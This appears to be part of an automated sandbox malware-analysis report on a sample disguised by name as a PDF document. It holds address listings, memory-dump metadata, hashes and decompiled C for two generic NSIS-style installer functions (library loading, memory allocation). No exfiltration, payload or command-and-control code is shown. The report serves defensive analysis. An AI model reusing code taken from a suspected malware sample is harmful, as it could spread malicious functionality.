                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c26
                                                                      0x00406c2a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c30
                                                                      0x00406c34
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c3a
                                                                      0x00406c3c
                                                                      0x00406c40
                                                                      0x00406c40
                                                                      0x00406c43
                                                                      0x00406c47
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c97
                                                                      0x00406c9b
                                                                      0x00406ca2
                                                                      0x00406ca5
                                                                      0x00406ca8
                                                                      0x00406cb2
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406c9d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cbe
                                                                      0x00406cc2
                                                                      0x00406cc9
                                                                      0x00406ccc
                                                                      0x00406ccf
                                                                      0x00406cc4
                                                                      0x00406cc4
                                                                      0x00406cc4
                                                                      0x00406cd2
                                                                      0x00406cd5
                                                                      0x00406cd8
                                                                      0x00406cd8
                                                                      0x00406cdb
                                                                      0x00406cde
                                                                      0x00406ce1
                                                                      0x00406ce1
                                                                      0x00406ce4
                                                                      0x00406ceb
                                                                      0x00406cf0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d7e
                                                                      0x00406d7e
                                                                      0x00406d82
                                                                      0x00407120
                                                                      0x00000000
                                                                      0x00407120
                                                                      0x00406d88
                                                                      0x00406d8b
                                                                      0x00406d8e
                                                                      0x00406d92
                                                                      0x00406d95
                                                                      0x00406d9b
                                                                      0x00406d9d
                                                                      0x00406d9d
                                                                      0x00406d9d
                                                                      0x00406da0
                                                                      0x00406da3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406973
                                                                      0x00406973
                                                                      0x00406977
                                                                      0x004070e4
                                                                      0x00000000
                                                                      0x004070e4
                                                                      0x0040697d
                                                                      0x00406980
                                                                      0x00406983
                                                                      0x00406987
                                                                      0x0040698a
                                                                      0x00406990
                                                                      0x00406992
                                                                      0x00406992
                                                                      0x00406992
                                                                      0x00406995
                                                                      0x00406998
                                                                      0x00406998
                                                                      0x0040699b
                                                                      0x0040699e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069a4
                                                                      0x004069aa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069b0
                                                                      0x004069b0
                                                                      0x004069b4
                                                                      0x004069b7
                                                                      0x004069ba
                                                                      0x004069bd
                                                                      0x004069c0
                                                                      0x004069c1
                                                                      0x004069c4
                                                                      0x004069c6
                                                                      0x004069cc
                                                                      0x004069cf
                                                                      0x004069d2
                                                                      0x004069d5
                                                                      0x004069d8
                                                                      0x004069db
                                                                      0x004069de
                                                                      0x004069fa
                                                                      0x004069fd
                                                                      0x00406a00
                                                                      0x00406a03
                                                                      0x00406a0a
                                                                      0x00406a0e
                                                                      0x00406a10
                                                                      0x00406a14
                                                                      0x004069e0
                                                                      0x004069e0
                                                                      0x004069e4
                                                                      0x004069ec
                                                                      0x004069f1
                                                                      0x004069f3
                                                                      0x004069f5
                                                                      0x004069f5
                                                                      0x00406a17
                                                                      0x00406a1e
                                                                      0x00406a21
                                                                      0x00000000
                                                                      0x00406a27
                                                                      0x00000000
                                                                      0x00406a27
                                                                      0x00000000
                                                                      0x00406a2c
                                                                      0x00406a2c
                                                                      0x00406a30
                                                                      0x004070f0
                                                                      0x00000000
                                                                      0x004070f0
                                                                      0x00406a36
                                                                      0x00406a39
                                                                      0x00406a3c
                                                                      0x00406a40
                                                                      0x00406a43
                                                                      0x00406a49
                                                                      0x00406a4b
                                                                      0x00406a4b
                                                                      0x00406a4b
                                                                      0x00406a4e
                                                                      0x00406a51
                                                                      0x00406a51
                                                                      0x00406a51
                                                                      0x00406a57
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a59
                                                                      0x00406a5c
                                                                      0x00406a5f
                                                                      0x00406a62
                                                                      0x00406a65
                                                                      0x00406a68
                                                                      0x00406a6b
                                                                      0x00406a6e
                                                                      0x00406a71
                                                                      0x00406a74
                                                                      0x00406a77
                                                                      0x00406a8f
                                                                      0x00406a92
                                                                      0x00406a95
                                                                      0x00406a98
                                                                      0x00406a9b
                                                                      0x00406a9f
                                                                      0x00406aa1
                                                                      0x00406a79
                                                                      0x00406a79
                                                                      0x00406a81
                                                                      0x00406a86
                                                                      0x00406a88
                                                                      0x00406a8a
                                                                      0x00406a8a
                                                                      0x00406aa4
                                                                      0x00406aab
                                                                      0x00406aae
                                                                      0x00000000
                                                                      0x00406ab0
                                                                      0x00000000
                                                                      0x00406ab0
                                                                      0x00406aae
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406af0
                                                                      0x00406af0
                                                                      0x00406af4
                                                                      0x004070fc
                                                                      0x00000000
                                                                      0x004070fc
                                                                      0x00406afa
                                                                      0x00406afd
                                                                      0x00406b00
                                                                      0x00406b04
                                                                      0x00406b07
                                                                      0x00406b0d
                                                                      0x00406b0f
                                                                      0x00406b0f
                                                                      0x00406b0f
                                                                      0x00406b12
                                                                      0x00406b15
                                                                      0x00406b15
                                                                      0x00406b1b
                                                                      0x00406ab9
                                                                      0x00406ab9
                                                                      0x00406abc
                                                                      0x00000000
                                                                      0x00406abc
                                                                      0x00406b1d
                                                                      0x00406b1d
                                                                      0x00406b20
                                                                      0x00406b23
                                                                      0x00406b26
                                                                      0x00406b29
                                                                      0x00406b2c
                                                                      0x00406b2f
                                                                      0x00406b32
                                                                      0x00406b35
                                                                      0x00406b38
                                                                      0x00406b3b
                                                                      0x00406b53
                                                                      0x00406b56
                                                                      0x00406b59
                                                                      0x00406b5c
                                                                      0x00406b5f
                                                                      0x00406b63
                                                                      0x00406b65
                                                                      0x00406b3d
                                                                      0x00406b3d
                                                                      0x00406b45
                                                                      0x00406b4a
                                                                      0x00406b4c
                                                                      0x00406b4e
                                                                      0x00406b4e
                                                                      0x00406b68
                                                                      0x00406b6f
                                                                      0x00406b72
                                                                      0x00000000
                                                                      0x00406b74
                                                                      0x00000000
                                                                      0x00406b74
                                                                      0x00000000
                                                                      0x00406e01
                                                                      0x00406e01
                                                                      0x00406e05
                                                                      0x0040712c
                                                                      0x00000000
                                                                      0x0040712c
                                                                      0x00406e0b
                                                                      0x00406e0e
                                                                      0x00406e11
                                                                      0x00406e15
                                                                      0x00406e18
                                                                      0x00406e1e
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406bd1
                                                                      0x00406bd1
                                                                      0x00406bd4
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f10
                                                                      0x00406f14
                                                                      0x00406f36
                                                                      0x00406f39
                                                                      0x00406f43
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f16
                                                                      0x00406f19
                                                                      0x00406f1d
                                                                      0x00406f20
                                                                      0x00406f20
                                                                      0x00406f23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406fcd
                                                                      0x00406fd1
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406ff6
                                                                      0x00406ffd
                                                                      0x00407004
                                                                      0x00407004
                                                                      0x00000000
                                                                      0x00407004
                                                                      0x00406fd3
                                                                      0x00406fd6
                                                                      0x00406fd9
                                                                      0x00406fdc
                                                                      0x00406fe3
                                                                      0x00406f27
                                                                      0x00406f27
                                                                      0x00406f2a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070be
                                                                      0x004070c1
                                                                      0x00406fc2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cf8
                                                                      0x00406cfa
                                                                      0x00406d01
                                                                      0x00406d02
                                                                      0x00406d04
                                                                      0x00406d07
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d0f
                                                                      0x00406d12
                                                                      0x00406d15
                                                                      0x00406d17
                                                                      0x00406d19
                                                                      0x00406d19
                                                                      0x00406d1a
                                                                      0x00406d1d
                                                                      0x00406d24
                                                                      0x00406d27
                                                                      0x00406d35
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040700b
                                                                      0x0040700b
                                                                      0x0040700e
                                                                      0x00407015
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040701a
                                                                      0x0040701a
                                                                      0x0040701e
                                                                      0x00407156
                                                                      0x00000000
                                                                      0x00407156
                                                                      0x00407024
                                                                      0x00407027
                                                                      0x0040702a
                                                                      0x0040702e
                                                                      0x00407031
                                                                      0x00407037
                                                                      0x00407039
                                                                      0x00407039
                                                                      0x00407039
                                                                      0x0040703c
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x00407042
                                                                      0x00407042
                                                                      0x00407046
                                                                      0x004070a6
                                                                      0x004070a9
                                                                      0x004070ae
                                                                      0x004070af
                                                                      0x004070b1
                                                                      0x004070b3
                                                                      0x004070b6
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x00000000
                                                                      0x00406fc8
                                                                      0x00406fc2
                                                                      0x00407048
                                                                      0x0040704e
                                                                      0x00407051
                                                                      0x00407054
                                                                      0x00407057
                                                                      0x0040705a
                                                                      0x0040705d
                                                                      0x00407060
                                                                      0x00407063
                                                                      0x00407066
                                                                      0x00407069
                                                                      0x00407082
                                                                      0x00407085
                                                                      0x00407088
                                                                      0x0040708b
                                                                      0x0040708f
                                                                      0x00407091
                                                                      0x00407091
                                                                      0x00407092
                                                                      0x00407095
                                                                      0x0040706b
                                                                      0x0040706b
                                                                      0x00407073
                                                                      0x00407078
                                                                      0x0040707a
                                                                      0x0040707d
                                                                      0x0040707d
                                                                      0x00407098
                                                                      0x0040709f
                                                                      0x00000000
                                                                      0x004070a1
                                                                      0x00000000
                                                                      0x004070a1
                                                                      0x00000000
                                                                      0x00406d3d
                                                                      0x00406d40
                                                                      0x00406d76
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea9
                                                                      0x00406ea9
                                                                      0x00406eac
                                                                      0x00406eae
                                                                      0x00407138
                                                                      0x00000000
                                                                      0x00407138
                                                                      0x00406eb4
                                                                      0x00406eb7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ebd
                                                                      0x00406ec1
                                                                      0x00406ec4
                                                                      0x00406ec4
                                                                      0x00406ec4
                                                                      0x00000000
                                                                      0x00406ec4
                                                                      0x00406d42
                                                                      0x00406d44
                                                                      0x00406d46
                                                                      0x00406d48
                                                                      0x00406d4b
                                                                      0x00406d4c
                                                                      0x00406d4e
                                                                      0x00406d50
                                                                      0x00406d53
                                                                      0x00406d56
                                                                      0x00406d6c
                                                                      0x00406d71
                                                                      0x00406da9
                                                                      0x00406da9
                                                                      0x00406dad
                                                                      0x00406dd9
                                                                      0x00406ddb
                                                                      0x00406de2
                                                                      0x00406de5
                                                                      0x00406de8
                                                                      0x00406de8
                                                                      0x00406ded
                                                                      0x00406ded
                                                                      0x00406def
                                                                      0x00406df2
                                                                      0x00406df9
                                                                      0x00406dfc
                                                                      0x00406e29
                                                                      0x00406e29
                                                                      0x00406e2c
                                                                      0x00406e2f
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00000000
                                                                      0x00406ea3
                                                                      0x00406e31
                                                                      0x00406e37
                                                                      0x00406e3a
                                                                      0x00406e3d
                                                                      0x00406e40
                                                                      0x00406e43
                                                                      0x00406e46
                                                                      0x00406e49
                                                                      0x00406e4c
                                                                      0x00406e4f
                                                                      0x00406e52
                                                                      0x00406e6b
                                                                      0x00406e6d
                                                                      0x00406e70
                                                                      0x00406e71
                                                                      0x00406e74
                                                                      0x00406e76
                                                                      0x00406e79
                                                                      0x00406e7b
                                                                      0x00406e7d
                                                                      0x00406e80
                                                                      0x00406e82
                                                                      0x00406e85
                                                                      0x00406e89
                                                                      0x00406e8b
                                                                      0x00406e8b
                                                                      0x00406e8c
                                                                      0x00406e8f
                                                                      0x00406e92
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e5c
                                                                      0x00406e61
                                                                      0x00406e63
                                                                      0x00406e66
                                                                      0x00406e66
                                                                      0x00406e95
                                                                      0x00406e9c
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00406e9c
                                                                      0x00406daf
                                                                      0x00406db2
                                                                      0x00406db4
                                                                      0x00406db7
                                                                      0x00406dba
                                                                      0x00406dbd
                                                                      0x00406dbf
                                                                      0x00406dc2
                                                                      0x00406dc5
                                                                      0x00406dc5
                                                                      0x00406dc8
                                                                      0x00406dc8
                                                                      0x00406dcb
                                                                      0x00406dd2
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00000000
                                                                      0x00406dd4
                                                                      0x00000000
                                                                      0x00406dd4
                                                                      0x00406dd2
                                                                      0x00406d58
                                                                      0x00406d5b
                                                                      0x00406d5d
                                                                      0x00406d60
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406abf
                                                                      0x00406abf
                                                                      0x00406ac3
                                                                      0x00407108
                                                                      0x00000000
                                                                      0x00407108
                                                                      0x00406ac9
                                                                      0x00406acc
                                                                      0x00406acf
                                                                      0x00406ad2
                                                                      0x00406ad5
                                                                      0x00406ad8
                                                                      0x00406adb
                                                                      0x00406add
                                                                      0x00406ae0
                                                                      0x00406ae3
                                                                      0x00406ae6
                                                                      0x00406ae8
                                                                      0x00406ae8
                                                                      0x00406ae8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c4a
                                                                      0x00406c4a
                                                                      0x00406c4e
                                                                      0x00407114
                                                                      0x00000000
                                                                      0x00407114
                                                                      0x00406c54
                                                                      0x00406c57
                                                                      0x00406c5a
                                                                      0x00406c5d
                                                                      0x00406c5f
                                                                      0x00406c5f
                                                                      0x00406c5f
                                                                      0x00406c62
                                                                      0x00406c65
                                                                      0x00406c68
                                                                      0x00406c6b
                                                                      0x00406c6e
                                                                      0x00406c71
                                                                      0x00406c72
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c77
                                                                      0x00406c7a
                                                                      0x00406c7d
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c83
                                                                      0x00406c85
                                                                      0x00406c85
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ecb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ed1
                                                                      0x00406ed4
                                                                      0x00406ed7
                                                                      0x00406eda
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edf
                                                                      0x00406ee2
                                                                      0x00406ee5
                                                                      0x00406ee8
                                                                      0x00406eeb
                                                                      0x00406eee
                                                                      0x00406eef
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef4
                                                                      0x00406ef7
                                                                      0x00406efa
                                                                      0x00406efd
                                                                      0x00406f00
                                                                      0x00406f04
                                                                      0x00406f06
                                                                      0x00406f09
                                                                      0x00000000
                                                                      0x00406f0b
                                                                      0x00406c88
                                                                      0x00406c88
                                                                      0x00000000
                                                                      0x00406c88
                                                                      0x00406f09
                                                                      0x0040713e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040676d
                                                                      0x00407175
                                                                      0x00407175
                                                                      0x00000000
                                                                      0x00407175
                                                                      0x00406fc2
                                                                      0x00406f49
                                                                      0x00406f46

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
                                                                      • Instruction ID: 57281eb70c6d5ee4f1dcb93120720bdacd8771e53a80a41a257af2ecf5b7c0f8
                                                                      • Opcode Fuzzy Hash: 5ce5b5824dab04b0af399fdb569f5160cdf810ce4d6e1efcb4a21919472af673
                                                                      • Instruction Fuzzy Hash: 7C714431D04229DBEF28CF98C844BADBBB1FF44305F11806AD856BB291C7789A96DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 60%
                                                                      			E00402032(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				void* _t34;
				WCHAR* _t37;
				intOrPtr* _t38;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a2f8");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2c8 =  *0x42a2c8 +  *(_t39 - 4);
					return 0;
				}
				_t37 = E00402C53(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x38)) = E00402C53("true");
				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t38 = E0040665B( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x38)));
					if(_t38 == _t32) {
						E00405371(0xfffffff7,  *((intOrPtr*)(_t39 - 0x38)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cddc, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x20)));
							if( *_t38() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E004039FB( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t37); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                      0x00402032
                                                                      0x00402032
                                                                      0x00402037
                                                                      0x0040203e
                                                                      0x004020fd
                                                                      0x0040224b
                                                                      0x0040224b
                                                                      0x00402adb
                                                                      0x00402ade
                                                                      0x00402aea
                                                                      0x00402aea
                                                                      0x0040204d
                                                                      0x00402057
                                                                      0x0040205a
                                                                      0x0040206a
                                                                      0x0040206e
                                                                      0x00402076
                                                                      0x00402079
                                                                      0x004020f6
                                                                      0x00000000
                                                                      0x004020f6
                                                                      0x0040207b
                                                                      0x00402086
                                                                      0x0040208a
                                                                      0x004020ca
                                                                      0x0040208c
                                                                      0x0040208f
                                                                      0x00402092
                                                                      0x004020be
                                                                      0x00402094
                                                                      0x00402097
                                                                      0x004020a0
                                                                      0x004020a2
                                                                      0x004020a2
                                                                      0x004020a0
                                                                      0x00402092
                                                                      0x004020d2
                                                                      0x004020eb
                                                                      0x004020eb
                                                                      0x00000000
                                                                      0x004020d2
                                                                      0x0040205d
                                                                      0x00402065
                                                                      0x00402068
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
                                                                        • Part of subcall function 00405371: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                                        • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                                        • Part of subcall function 00405371: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00402EAD), ref: 004053CC
                                                                        • Part of subcall function 00405371: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll), ref: 004053DE
                                                                        • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                                        • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                                        • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 0040206E
                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 334405425-0
                                                                      • Opcode ID: 1fc4ff1b2770f6a55ac86ed4dffe08314e688674bf1be9a602d23f21d00d8940
                                                                      • Instruction ID: e4abfbb00710fbb49cfbee30f6c47c6475fc16ace361a0eeed54ffc6686eb32c
                                                                      • Opcode Fuzzy Hash: 1fc4ff1b2770f6a55ac86ed4dffe08314e688674bf1be9a602d23f21d00d8940
                                                                      • Instruction Fuzzy Hash: EB21AD71900215EBCF206FA5CE4999E7971BF04358F60453BF511B51E0CBBD8982DA6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 59%
                                                                      			E00401B71(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x40cddc; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x24)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E00406234(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x28)));
						_t12 =  *0x40cddc; // 0x0
						 *_t34 = _t12;
						 *0x40cddc = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t30 + 4; // 0x4
							E00406212(_t33, _t3);
							_push(_t30);
							 *0x40cddc =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t30 == _t28) {
							break;
						}
						_t30 =  *_t30;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t30 == _t28) {
								break;
							} else {
								_t32 = _t30 + 4;
								_t36 = L"Call";
								E00406212(_t36, _t30 + 4);
								_t22 =  *0x40cddc; // 0x0
								E00406212(_t32, _t22 + 4);
								_t25 =  *0x40cddc; // 0x0
								_push(_t36);
								_push(_t25 + 4);
								E00406212();
								L15:
								 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E00406234(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405957();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}














                                                                      0x00401b71
                                                                      0x00401b71
                                                                      0x00401b74
                                                                      0x00401b7c
                                                                      0x00401bc5
                                                                      0x00401bf3
                                                                      0x00401bfc
                                                                      0x00401bfe
                                                                      0x00401c02
                                                                      0x00401c07
                                                                      0x00401c0c
                                                                      0x00401c0e
                                                                      0x00401bc7
                                                                      0x00401bc9
                                                                      0x004028a1
                                                                      0x00401bcf
                                                                      0x00401bcf
                                                                      0x00401bd4
                                                                      0x00401bdb
                                                                      0x00401bdc
                                                                      0x00401be1
                                                                      0x00401be1
                                                                      0x00401bc9
                                                                      0x00000000
                                                                      0x00401b7e
                                                                      0x00401b7e
                                                                      0x00401b7e
                                                                      0x00401b81
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401b87
                                                                      0x00401b8b
                                                                      0x00000000
                                                                      0x00401b8d
                                                                      0x00401b8f
                                                                      0x00000000
                                                                      0x00401b95
                                                                      0x00401b95
                                                                      0x00401b98
                                                                      0x00401b9f
                                                                      0x00401ba4
                                                                      0x00401bae
                                                                      0x00401bb3
                                                                      0x00401bb8
                                                                      0x00401bbc
                                                                      0x004029f7
                                                                      0x00402adb
                                                                      0x00402ade
                                                                      0x00402ae4
                                                                      0x00402ae4
                                                                      0x00401b8f
                                                                      0x00000000
                                                                      0x00401b8b
                                                                      0x004022e4
                                                                      0x004022f1
                                                                      0x004022f2
                                                                      0x004022f7
                                                                      0x004022f7
                                                                      0x00402ae6
                                                                      0x00402aea

                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00401BE1
                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree
                                                                      • String ID: Call
                                                                      • API String ID: 3394109436-1824292864
